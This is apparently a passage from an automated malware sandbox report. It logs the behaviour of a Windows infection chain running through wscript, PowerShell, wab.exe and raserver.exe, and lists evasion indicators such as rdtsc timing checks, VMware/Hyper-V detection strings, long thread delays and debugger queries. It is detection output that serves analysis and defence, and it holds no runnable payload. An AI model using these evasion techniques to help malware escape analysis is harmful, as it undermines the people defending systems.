Source: C:\Program Files (x86)\Windows Mail\wab.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\raserver.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\raserver.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\raserver.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\raserver.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\raserver.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Program Files (x86)\Windows Mail\wab.exe API/Special instruction interceptor: Address: 667B970
Source: C:\Program Files (x86)\Windows Mail\wab.exe API/Special instruction interceptor: Address: 7FFB2CED0774
Source: C:\Program Files (x86)\Windows Mail\wab.exe API/Special instruction interceptor: Address: 7FFB2CED0154
Source: C:\Program Files (x86)\Windows Mail\wab.exe API/Special instruction interceptor: Address: 7FFB2CECD8A4
Source: C:\Program Files (x86)\Windows Mail\wab.exe API/Special instruction interceptor: Address: 7FFB2CECDA44
Source: C:\Windows\SysWOW64\raserver.exe API/Special instruction interceptor: Address: 7FFB2CECD324
Source: C:\Windows\SysWOW64\raserver.exe API/Special instruction interceptor: Address: 7FFB2CED0774
Source: C:\Windows\SysWOW64\raserver.exe API/Special instruction interceptor: Address: 7FFB2CECD944
Source: C:\Windows\SysWOW64\raserver.exe API/Special instruction interceptor: Address: 7FFB2CECD504
Source: C:\Windows\SysWOW64\raserver.exe API/Special instruction interceptor: Address: 7FFB2CECD544
Source: C:\Windows\SysWOW64\raserver.exe API/Special instruction interceptor: Address: 7FFB2CECD1E4
Source: C:\Windows\SysWOW64\raserver.exe API/Special instruction interceptor: Address: 7FFB2CED0154
Source: C:\Windows\SysWOW64\raserver.exe API/Special instruction interceptor: Address: 7FFB2CECD8A4
Source: C:\Windows\SysWOW64\raserver.exe API/Special instruction interceptor: Address: 7FFB2CECDA44
Source: C:\Windows\SysWOW64\raserver.exe API/Special instruction interceptor: Address: 7FFB2CECD7E4
Source: C:\Windows\SysWOW64\raserver.exe API/Special instruction interceptor: Address: 7FFB2CECDA04
Source: C:\Windows\SysWOW64\raserver.exe API/Special instruction interceptor: Address: 7FFB2CECD744
Source: C:\Program Files (x86)\Windows Mail\wab.exe RDTSC instruction interceptor: First address: 409904 second address: 40990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Program Files (x86)\Windows Mail\wab.exe RDTSC instruction interceptor: First address: 409B6E second address: 409B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\raserver.exe RDTSC instruction interceptor: First address: 1D9904 second address: 1D990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\raserver.exe RDTSC instruction interceptor: First address: 1D9B6E second address: 1D9B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2249D1C0 rdtsc 20_2_2249D1C0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6330
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3535
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7156
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2575
Source: C:\Program Files (x86)\Windows Mail\wab.exe Window / User API: threadDelayed 750
Source: C:\Windows\explorer.exe Window / User API: foregroundWindowGot 634
Source: C:\Windows\explorer.exe Window / User API: foregroundWindowGot 586
Source: C:\Program Files (x86)\Windows Mail\wab.exe API coverage: 1.7 %
Source: C:\Windows\SysWOW64\raserver.exe API coverage: 2.0 %
Source: C:\Windows\System32\wscript.exe TID: 6760 Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7676 Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7796 Thread sleep count: 7156 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7796 Thread sleep count: 2575 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7828 Thread sleep time: -3689348814741908s >= -30000s
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 8148 Thread sleep count: 750 > 30
Source: C:\Windows\SysWOW64\raserver.exe TID: 4064 Thread sleep time: -42000s >= -30000s
Source: C:\Windows\SysWOW64\raserver.exe Last function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: wscript.exe, 00000000.00000002.1370620329.0000020476C3F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
Source: wscript.exe, 00000000.00000003.1369707931.000002047516F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1370313493.000002047516F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1244762105.000002047773E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1244435885.000002047773E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1371689572.000002047773E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1367860094.000002047773E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: wscript.exe, 00000000.00000003.1367477793.000002047770E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}<
Source: powershell.exe, 0000000C.00000002.2097671228.000001A8DDA95000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW17
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
Source: C:\Windows\SysWOW64\raserver.exe Process queried: DebugPort
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2249D1C0 rdtsc 20_2_2249D1C0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 16_2_045AD6CC LdrInitializeThunk, 16_2_045AD6CC
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_00C8ACA0 LoadLibraryW,GetProcAddress,GetProcAddress,WTSEnumerateSessionsW,GetProcessHeap,HeapAlloc,WTSFreeMemory,WTSFreeMemory,WTSQuerySessionInformationW,WTSQuerySessionInformationW,StrCmpIW,GetProcessHeap,HeapAlloc,SafeArrayCreateVector,SafeArrayAccessData,SysAllocString,SafeArrayUnaccessData,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,WTSFreeMemory,WTSFreeMemory,WTSFreeMemory,SafeArrayDestroy,SysFreeString, 25_2_00C8ACA0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22419240 mov eax, dword ptr fs:[00000030h] 20_2_22419240
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22419240 mov eax, dword ptr fs:[00000030h] 20_2_22419240
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2245724D mov eax, dword ptr fs:[00000030h] 20_2_2245724D
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224A8243 mov eax, dword ptr fs:[00000030h] 20_2_224A8243
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224A8243 mov ecx, dword ptr fs:[00000030h] 20_2_224A8243
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2241A250 mov eax, dword ptr fs:[00000030h] 20_2_2241A250
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224AD250 mov ecx, dword ptr fs:[00000030h] 20_2_224AD250
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224DB256 mov eax, dword ptr fs:[00000030h] 20_2_224DB256
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224DB256 mov eax, dword ptr fs:[00000030h] 20_2_224DB256
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22426259 mov eax, dword ptr fs:[00000030h] 20_2_22426259
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22424260 mov eax, dword ptr fs:[00000030h] 20_2_22424260
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22424260 mov eax, dword ptr fs:[00000030h] 20_2_22424260
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22424260 mov eax, dword ptr fs:[00000030h] 20_2_22424260
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224ED26B mov eax, dword ptr fs:[00000030h] 20_2_224ED26B
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224ED26B mov eax, dword ptr fs:[00000030h] 20_2_224ED26B
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2241826B mov eax, dword ptr fs:[00000030h] 20_2_2241826B
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22449274 mov eax, dword ptr fs:[00000030h] 20_2_22449274
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22461270 mov eax, dword ptr fs:[00000030h] 20_2_22461270
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22461270 mov eax, dword ptr fs:[00000030h] 20_2_22461270
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224D0274 mov eax, dword ptr fs:[00000030h] 20_2_224D0274
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224D0274 mov eax, dword ptr fs:[00000030h] 20_2_224D0274
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224D0274 mov eax, dword ptr fs:[00000030h] 20_2_224D0274
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224D0274 mov eax, dword ptr fs:[00000030h] 20_2_224D0274
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224D0274 mov eax, dword ptr fs:[00000030h] 20_2_224D0274
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224D0274 mov eax, dword ptr fs:[00000030h] 20_2_224D0274
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224D0274 mov eax, dword ptr fs:[00000030h] 20_2_224D0274
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224D0274 mov eax, dword ptr fs:[00000030h] 20_2_224D0274
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224D0274 mov eax, dword ptr fs:[00000030h] 20_2_224D0274
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224D0274 mov eax, dword ptr fs:[00000030h] 20_2_224D0274
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224D0274 mov eax, dword ptr fs:[00000030h] 20_2_224D0274
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224D0274 mov eax, dword ptr fs:[00000030h] 20_2_224D0274
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22457208 mov eax, dword ptr fs:[00000030h] 20_2_22457208
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22457208 mov eax, dword ptr fs:[00000030h] 20_2_22457208
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224F5227 mov eax, dword ptr fs:[00000030h] 20_2_224F5227
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2241823B mov eax, dword ptr fs:[00000030h] 20_2_2241823B
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2242A2C3 mov eax, dword ptr fs:[00000030h] 20_2_2242A2C3
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2242A2C3 mov eax, dword ptr fs:[00000030h] 20_2_2242A2C3
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2242A2C3 mov eax, dword ptr fs:[00000030h] 20_2_2242A2C3
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2242A2C3 mov eax, dword ptr fs:[00000030h] 20_2_2242A2C3
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2242A2C3 mov eax, dword ptr fs:[00000030h] 20_2_2242A2C3
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2244B2C0 mov eax, dword ptr fs:[00000030h] 20_2_2244B2C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2244B2C0 mov eax, dword ptr fs:[00000030h] 20_2_2244B2C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2244B2C0 mov eax, dword ptr fs:[00000030h] 20_2_2244B2C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2244B2C0 mov eax, dword ptr fs:[00000030h] 20_2_2244B2C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2244B2C0 mov eax, dword ptr fs:[00000030h] 20_2_2244B2C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2244B2C0 mov eax, dword ptr fs:[00000030h] 20_2_2244B2C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2244B2C0 mov eax, dword ptr fs:[00000030h] 20_2_2244B2C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224292C5 mov eax, dword ptr fs:[00000030h] 20_2_224292C5
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224292C5 mov eax, dword ptr fs:[00000030h] 20_2_224292C5
